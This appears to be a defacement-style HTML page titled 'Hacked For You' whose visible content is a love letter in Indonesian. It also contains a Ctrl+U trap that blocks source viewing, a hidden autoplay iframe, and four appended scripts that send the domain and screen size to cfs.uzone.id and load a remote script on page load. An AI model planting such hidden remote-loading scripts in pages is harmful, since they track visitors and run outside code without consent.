<html>
<head>
<link rel="icon" type="image/png" href="https://i0.wp.com/upload.wikimedia.org/wikipedia/commons/thumb/9/9f/Flag_of_Indonesia.svg/240px-Flag_of_Indonesia.svg.png" />
<title>Hacked For You</title>
<body> <script type='text/javascript'>
//<![CDATA[
shortcut={all_shortcuts:{},add:function(a,b,c){var d={type:"keydown",propagate:!1,disable_in_input:!1,target:document,keycode:!1};if(c)for(var e in d)"undefined"==typeof c[e]&&(c[e]=d[e]);else c=d;d=c.target,"string"==typeof c.target&&(d=document.getElementById(c.target)),a=a.toLowerCase(),e=function(d){d=d||window.event;if(c.disable_in_input){var e;d.target?e=d.target:d.srcElement&&(e=d.srcElement),3==e.nodeType&&(e=e.parentNode);if("INPUT"==e.tagName||"TEXTAREA"==e.tagName)return}d.keyCode?code=d.keyCode:d.which&&(code=d.which),e=String.fromCharCode(code).toLowerCase(),188==code&&(e=","),190==code&&(e=".");var f=a.split("+"),g=0,h={"`":"~",1:"!",2:"@",3:"#",4:"$",5:"%",6:"^",7:"&",8:"*",9:"(",0:")","-":"_","=":"+",";":":","'":'"',",":"<",".":">","/":"?","\\":"|"},i={esc:27,escape:27,tab:9,space:32,"return":13,enter:13,backspace:8,scrolllock:145,scroll_lock:145,scroll:145,capslock:20,caps_lock:20,caps:20,numlock:144,num_lock:144,num:144,pause:19,"break":19,insert:45,home:36,"delete":46,end:35,pageup:33,page_up:33,pu:33,pagedown:34,page_down:34,pd:34,left:37,up:38,right:39,down:40,f1:112,f2:113,f3:114,f4:115,f5:116,f6:117,f7:118,f8:119,f9:120,f10:121,f11:122,f12:123},j=!1,l=!1,m=!1,n=!1,o=!1,p=!1,q=!1,r=!1;d.ctrlKey&&(n=!0),d.shiftKey&&(l=!0),d.altKey&&(p=!0),d.metaKey&&(r=!0);for(var s=0;k=f[s],s<f.length;s++)"ctrl"==k||"control"==k?(g++,m=!0):"shift"==k?(g++,j=!0):"alt"==k?(g++,o=!0):"meta"==k?(g++,q=!0):1<k.length?i[k]==code&&g++:c.keycode?c.keycode==code&&g++:e==k?g++:h[e]&&d.shiftKey&&(e=h[e],e==k&&g++);if(g==f.length&&n==m&&l==j&&p==o&&r==q&&(b(d),!c.propagate))return d.cancelBubble=!0,d.returnValue=!1,d.stopPropagation&&(d.stopPropagation(),d.preventDefault()),!1},this.all_shortcuts[a]={callback:e,target:d,event:c.type},d.addEventListener?d.addEventListener(c.type,e,!1):d.attachEvent?d.attachEvent("on"+c.type,e):d["on"+c.type]=e},remove:function(a){var a=a.toLowerCase(),b=this.all_shortcuts[a];delete this.all_shortcuts[a];if(b){var a=b.event,c=b.target,b=b.callback;c.detachEvent?c.detachEvent("on"+a,b):c.removeEventListener?c.removeEventListener(a,b,!1):c["on"+a]=!1}}},shortcut.add("Ctrl+U",function(){top.location.href="http://3.bp.blogspot.com/-YPko1hoi0ug/UWDWMEoLioI/AAAAAAAAD18/VjbIhFkk_7M/s1600/ketahuan.jpg"});
//]]>
</script>
<script>
function tb8_makeArray(n){
this.length = n;
return this.length;
}
 
tb8_messages = new tb8_makeArray(4);
tb8_messages[0] = "Hacked For You";
tb8_messages[1] = "Hacked For You";
tb8_messages[2] = "Hacked For You";
tb8_messages[3] = "Hacked For You";
tb8_messages[4] = "Hacked For You";
tb8_messages[5] = "Hacked For You";
tb8_messages[6] = "Hacked For You";
tb8_messages[7] = "Hacked For You";
tb8_messages[8] = "Hacked For You";
tb8_messages[9] = "Hacked For You";
tb8_messages[10] = "Hacked For You";
tb8_rptType = 'infinite';
tb8_rptNbr = 5;
tb8_speed = 500;
tb8_delay = 2000;
var tb8_counter=1;
var tb8_currMsg=0;
var tb8_tekst ="";
var tb8_i=0;
var tb8_TID = null;
function tb8_pisi(){
tb8_tekst = tb8_tekst + tb8_messages[tb8_currMsg].substring(tb8_i, tb8_i+1);
document.title = tb8_tekst;
tb8_sp=tb8_speed;
tb8_i++;
if (tb8_i==tb8_messages[tb8_currMsg].length){
tb8_currMsg++; tb8_i=0; tb8_tekst="";tb8_sp=tb8_delay;
}
if (tb8_currMsg == tb8_messages.length){
if ((tb8_rptType == 'finite') && (tb8_counter==tb8_rptNbr)){
clearTimeout(tb8_TID);
return; } tb8_counter++;
tb8_currMsg = 0;
}
tb8_TID = setTimeout("tb8_pisi()", tb8_sp);
}
tb8_pisi()
</script>
<style type="text/css">
body,td,th {
	font-family: "Courier New", Courier, monospace;
	font-size: 16px;
	color: #FFF;
	text-align: center;
}
body {
	background-color: #000;
	cursor: none;
	background-image:;
	background-attachment: fixed;
	background-position: center;
	background-size: contain;
	background-image: url(); <!-- Gambar Background -->
	background-repeat: no-repeat;
}
a {
	font-family: "Courier New", Courier, monospace;
	font-size: 16px;
	color: #F00;
}
.judul {
	font-family: "Courier New", Courier, monospace;
	font-size: 30px;
	text-align: center;
}
.pct {
	font-size: 60px;
	text-shadow: 0 0 20px #00F, 0 0 20px #00F, 0 0 20px #00F, 0 0 20px #00F;
	font-weight: bold;
}

.message {
	font-size: 12px;
	text-shadow: 0 0 15px #00F, 0 0 15px #00F, 0 0 15px #00F, 0 0 15px #00F;
	font-weight: bold;
}
.patch {
	font-size: 36px;
}

.greetz {
	font-size: 20px;
	color: #00F;
}
.defaced {
	font-size: 18px;
	color: #FFF;
}
.by {
	color: #00F;
	font-size: 13px;
}
a:link {
	text-decoration: none;
}
a:visited {
	text-decoration: none;
}
a:hover {
	text-decoration: underline;
}
a:active {
	text-decoration: none;
	color: #FFF;
}
</style>
</head>
<!-- start: index -->
<center>
<font face="Courier" size="10" color="Seashell">Dear Mpuy<br>
<img src="https://4.bp.blogspot.com/-f4iUuoxdNf8/WbE0MqWaLsI/AAAAAAAAAc8/BNs1wSeDpAMiLCpiz-Be_n-NbgZRDp40gCLcBGAs/s1600/21150223_504336816571207_958538629653891705_n.jpg" width="350" height="350"/><br>
<font size="5" color="Aqua">Aku Tidak Tau Lagi Dengan Kata Apa Aku Mengucapkannya Kepadamu</br>
<font size="5" color="Aqua">Tapi Yang Jelas Terima kasih Kau Telah Merubah Hidupku</br>
<font size="5" color="Aqua">Kamu Adalah Orang Yang Selalu Menyemangatiku</br>
<font size="5" color="Aqua">Andai Ibu Aku Tau Bahwa Aku Telah Menemukan Bidadari Yang Sangat Mengerti Tentang Perasaanku</br>
<font size="5" color="Aqua">Mungkin Ibu Aku Akan Berkata Bahawa "Jagalah Anak Ibu Nak"</br>
<font size="5" color="Aqua">Kamu Segalanya Mput Buat Aku, Sampai Aku Tau Mungkin Aku Hidup Hanya Untukmu Mput</br>
<font size="5" color="Aqua">Aku Sangat Menyayangimu</br>
<font size="5" color="Aqua">Alafyu :*</br><br>
<font size="5" color="Aqua">01 - 06 - 2016</br>
<font size="3" color="Blue"><br><br><p><p>
  <div data-role="footer" class="by">
    &copy; Copyright 2017, SINXYS
	 <
  </div></center>
<script language="JavaScript">
<!--
function java(){
alert("For You :*");
}
function LoadFunctions(){
java();
}
-->
</script>
<body onLoad="LoadFunctions()">
<iframe width="0" height="0" src="https://www.youtube.com/embed/FocFked1TbQ?rel=0&autoplay=1&loop=1" frameborder="0" allowfullscreen>
<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs.uzone.id/2fn7a2/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582CL4NjpNgssK05VJsZpxJ%2fsmBBm0FR5zujNPlAxgtCwCiXFgXkehv74h9vrDFwzSiVRRvafYiO43l2zKrkFpiEJE%2bMgpQ72gHJB2c0BpWScVygazLHqx2a0PigWnQeMM0YtHkKe%2fJwpw8CFuaOM8NN3aFlg3kO6FAjFT54uFqj4dsQ1Q6Cd39k8iFAw9JmLWplQR5McVoXgrj2mfE1FsiH7yIFAbexepqlKc4Lek2sc8Rq3gVgv5UdMywYEXe5HLFYk%2fnjK744TKQNwV92%2fFQ73LymI5j5vjYNuWOeqT4L6ohFxoMVCSvEXKsJYER4utC%2fLYxmnJg30SPlmh%2bCfZsRhzLz8xfx0mgLLJMxEd40brM9jGIYzq%2fx7QqWiBOhMur1MQTbEaviZqlgudyAH2qgKFIcYL2IkybmKIusm6dIaEWo094SPx1%2fJ0FmSPI3useJ6GZKG2QZ3808vatB9%2fC%2f6ZwIVj7FsZ2%2bGgOrQ15IHKfn70SOjdWwA8k%2bsUWE5wmcOY6ErmUwgdvLyQRGuV1qLdSsefZMjaFy5d8uv5L1huadMVSHV8D%2bTpQxLAGfgvMA%3d%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script><script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs.uzone.id/2fn7a2/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582CL4NjpNgssKe85KuTfHX%2fRG3IWj3qKk8PzcjOPNJ94SsF6AQCPM8AKMx0wAaZZyDv6utTRy03cK%2bM4Hb8KXUPZRFDrzG2X42MS5oGhj2GFWgZcOmF90I5lRhGu23cstWnOM07F0tIdVGggDYqgvP1fWCMf3QFEOOW7x52mE9lK%2b9sOsYWSVI2Pds02N%2bC4wpvn9Fs2gYN5CmS196ALTc5EitkTZX76z7rmguMdmItu8HQJ5w9yRpNiLEcSus1P6tlfdh6tjYjTwNk0yW5PaiD6Zu2HY7WCsPDoPDscFRijTAUpF20TfFbmH0OfxaQfw3FCkaKcc68V7ZPwxvMdK9q3kTSf4uX8Sl%2fAbjqPA6fFazOBCvL4ApxiDDiLe4w9ACYKmRsLhyZynUeTVMg%2fgi6poba5tn%2bIUeAFM1IOc%2fbPoQd2NWVj5dpgDdlk%2b0HjeqJRR%2bAJKqaj4cnPaaR5aNzPdCWOfJw0f3YbBCbF5dKLsTNTFYeRC7gWP73piNIGSjt%2f3cRZGuASqL8rj0QOE9%2bRyv6XzYvdGJw%2fEiSdYEspo" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script><script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs.uzone.id/2fn7a2/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582CL4NjpNgssKDgFKdZAjQIMGIQCmCIbrN3AL2ytdDPVMMvu3TlpKAGv4cJhEZ7hz61YaMaffAcXcQAus890FQZ6hJDoG%2bNfFHTzIAGk%2fKlxHemoivGC4lHYWv8RzwVUsVBXEWyVxpBjf%2f1gweElhuL6CdAZbWDPZ8n8g%2f74zS0dbPe4PeeBr%2ftxuhstwD0sqxQ19DlrEfqhAVybLB%2ftzwEeGj%2f%2fdWKdZZ0EoXZrWphphNdCAQA%2b3DVX3d0gellhEdVSHXDV7OCD4kpho0nevKI2SqPYFn790r%2bPWsWZx%2bSgJmbnX2iWjEg4wzHLHEeRhUhDtMvtCLNczj11%2f%2bJblG5fvKYywIuTDu8svGmEfpg216zz%2f3YlHgRuAONn5wLnRys%2bsn81rMDi6CKc8KhPoexA3Rlu7LgH5Hp5TRnwdNfNbkTeZmoZ95%2fJ7abAM74SySM4Re1E1TlCTZR0fnHOiDmEQUVgONRej%2bfcz1lw9fAjyCPVuCnf6cZA3ot4JIiQD6bWeuS%2b45PPVFD1U0dgH97J8wDN30A1l%2fB5fAd7Mub8tm7bZfPAnjX0%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script><script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs.uzone.id/2fn7a2/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582CL4NjpNgssK5SwovMOVpS4tUBaW83uhBWdy7Q3bhWKCjY9E9SAsPxG1%2f8fwvkNXjHRYm7Xw66cTjqWw7KOEYuycKs5dQQ7HV73uUjj7AcjTskCFBcDEzHD7%2bSd6drlkl30sP4F1dCIgUrVo7bZ2fmvvDokNUY%2b6ypHnNBP9NOB7piYDTuheENX3d6Lt8o%2fZ6sOMRfa%2bycvwjXeiE3%2bi9Ym1363ZZdd3xt3o7iEi3twajSwzXeDEKwPfmDNR5d0EnO%2bGoEBvdriDBjFxxgdPIK7ZDbAuKVUTcTDhk%2fnajGcTegPQmnGD1mTYhZUDdpqHl0rwBlkkzxU0kgoePKHdZG6bHNACIAfXoPXT9eJ3PB86do8MTxPISCp%2bM3xd%2fyLkNJEHizRcUMJ04BLWGPaQvmV6PhOmPAj0RcUlpSt6%2bsOy4cb4tD86Dp6a16dfIIaywnpgefbRX%2bk2B%2f4SXiFbDfLD5VL7%2fGH1WpqGZgl9ugnYeL09o1CHBlxiir2KXIqIUpTRPjofAQUft1qz63pceV8AYqZBgE9ZrhqK1Vd%2fKL6thWZGNkxxkr0%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body></html>